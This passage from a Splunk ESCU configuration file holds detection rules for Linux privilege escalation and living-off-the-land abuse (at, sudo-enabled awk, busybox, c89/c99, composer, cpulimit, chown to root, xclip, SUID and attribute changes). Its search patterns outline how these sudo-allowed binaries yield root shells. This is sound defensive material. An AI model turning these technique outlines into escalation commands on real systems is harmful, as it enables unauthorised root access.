action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux At Application Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = At application was executed in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux At Application Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Processes where Processes.process_name IN ("at", "atd") OR Processes.parent_process_name IN ("at", "atd") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_at_application_execution_filter` [ESCU - Linux AWK Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Awk is mostly used for processing and scanning patterns. It checks one or more files to determine whether any lines fit the specified patterns, and if so, it does the appropriate action. If sudo right is given to AWK binary for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Awk is mostly used for processing and scanning patterns. It checks one or more files to determine whether any lines fit the specified patterns, and if so, it does the appropriate action. If sudo right is given to AWK binary for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. 
action.escu.creation_date = 2022-07-31 action.escu.modification_date = 2022-07-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux AWK Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux AWK Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*sudo*" AND Processes.process="*awk*" AND Processes.process="*BEGIN*system*" by Processes.dest Processes.user 
Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_awk_privilege_escalation_filter` [ESCU - Linux Busybox Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides minimalist replacements for most of the utilities you usually find in GNU coreutils, util-linux, etc. If sudo right is given to BusyBox application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides minimalist replacements for most of the utilities you usually find in GNU coreutils, util-linux, etc. If sudo right is given to BusyBox application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Busybox Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Busybox Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as 
firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*busybox*" AND Processes.process="*sh*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_busybox_privilege_escalation_filter` [ESCU - Linux c89 Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The c89 and cc commands compile, assemble, and link-edit C programs; the cxx or c++ command does the same for C++ programs. The c89 command should be used when compiling C programs that are written according to Standard C. If sudo right is given to c89 application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The c89 and cc commands compile, assemble, and link-edit C programs; the cxx or c++ command does the same for C++ programs. The c89 command should be used when compiling C programs that are written according to Standard C. If sudo right is given to c89 application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux c89 Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux c89 Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 
allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*c89*" AND Processes.process="*-wrapper*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_c89_privilege_escalation_filter` [ESCU - Linux c99 Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The c99 utility is an interface to the standard C compilation system; it shall accept source code conforming to the ISO C standard. The system conceptually consists of a compiler and link editor. If sudo rights are given to the c99 application for a user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The c99 utility is an interface to the standard C compilation system; it shall accept source code conforming to the ISO C standard. The system conceptually consists of a compiler and link editor. If sudo rights are given to the c99 application for a user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux c99 Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux c99 Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, 
"kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*c99*" AND Processes.process="*-wrapper*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_c99_privilege_escalation_filter` [ESCU - Linux Change File Owner To Root - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for a command line that changes the file owner to root using the chown utility. This technique is commonly abused by adversaries, malware authors and red teamers to escalate privileges on the targeted or compromised host by changing the owner of their malicious file to root. This event is not common in corporate networks except when an administrator performs a normal task that needs high privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222.002", "T1222"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for a command line that changes the file owner to root using the chown utility. This technique is commonly abused by adversaries, malware authors and red teamers to escalate privileges on the targeted or compromised host by changing the owner of their malicious file to root. This event is not common in corporate networks except when an administrator performs a normal task that needs high privileges. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Change File Owner To Root - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may change ownership to root on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Change File Owner To Root - Rule action.correlationsearch.annotations 
= {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222.002", "T1222"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = chown OR Processes.process = "*chown *") AND Processes.process = "* root *" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_change_file_owner_to_root_filter` [ESCU - Linux Clipboard Data Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of Linux Xclip copying data out of the clipboard. Adversaries have utilized this technique to capture passwords, IP addresses, or store payloads. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of Linux Xclip copying data out of the clipboard. Adversaries have utilized this technique to capture passwords, IP addresses, or store payloads. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present on Linux desktop as it may commonly be used by administrators or end users. Filter as needed. action.escu.creation_date = 2022-07-28 action.escu.modification_date = 2022-07-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Clipboard Data Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ adding or removing content from the clipboard. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 16}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 16}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 16}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Clipboard Data Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1115"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=xclip Processes.process IN ("*-o *", "*-sel *", "*-selection *", "*clip *","*clipboard*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_clipboard_data_copy_filter` [ESCU - Linux Common Process For Elevation Control - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for possible abuse of elevation control mechanisms using common, well-known processes on the Linux platform that change file attributes and file ownership. This technique is commonly abused by adversaries, malware authors and red teamers to gain persistence or escalate privileges on the target or compromised host. 
These common processes are used to modify file attributes, file ownership or the SUID bit. These tools can be used for legitimate purposes, so filtering is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for possible abuse of elevation control mechanisms using common, well-known processes on the Linux platform that change file attributes and file ownership. This technique is commonly abused by adversaries, malware authors and red teamers to gain persistence or escalate privileges on the target or compromised host. These common processes are used to modify file attributes, file ownership or the SUID bit. These tools can be used for legitimate purposes, so filtering is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. 
action.escu.creation_date = 2021-12-23 action.escu.modification_date = 2021-12-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Common Process For Elevation Control - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Common Process For Elevation Control - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("chmod", "chown", "fchmod", "fchmodat", "fchown", "fchownat", "fremovexattr", "fsetxattr", "lchown", "lremovexattr", "lsetxattr", "removexattr", "setuid", "setgid", "setreuid", "setregid", "chattr") OR Processes.process IN ("*chmod *", "*chown *", "*fchmod *", "*fchmodat *", "*fchown *", "*fchownat *", "*fremovexattr *", "*fsetxattr *", "*lchown *", "*lremovexattr *", "*lsetxattr *", "*removexattr *", "*setuid *", "*setgid *", "*setreuid *", "*setregid *", "*setcap *", "*chattr *") by Processes.dest 
Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_common_process_for_elevation_control_filter` [ESCU - Linux Composer Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Composer is a tool for dependency management in PHP. It allows you to declare the libraries your project depends on and it will manage (install/update) them for you. If sudo right is given to tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Composer is a tool for dependency management in PHP. It allows you to declare the libraries your project depends on and it will manage (install/update) them for you. If sudo right is given to tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Composer Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Composer Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*composer*" AND 
Processes.process="*run-script*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_composer_privilege_escalation_filter` [ESCU - Linux Cpulimit Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = cpulimit is a simple program which attempts to limit the cpu usage of a process (expressed in percentage, not in cpu time). This is useful to control batch jobs, when you don't want them to eat too much cpu. If sudo right is given to the program for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = cpulimit is a simple program which attempts to limit the cpu usage of a process (expressed in percentage, not in cpu time). This is useful to control batch jobs, when you don't want them to eat too much cpu. If sudo right is given to the program for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Cpulimit Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Cpulimit Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) 
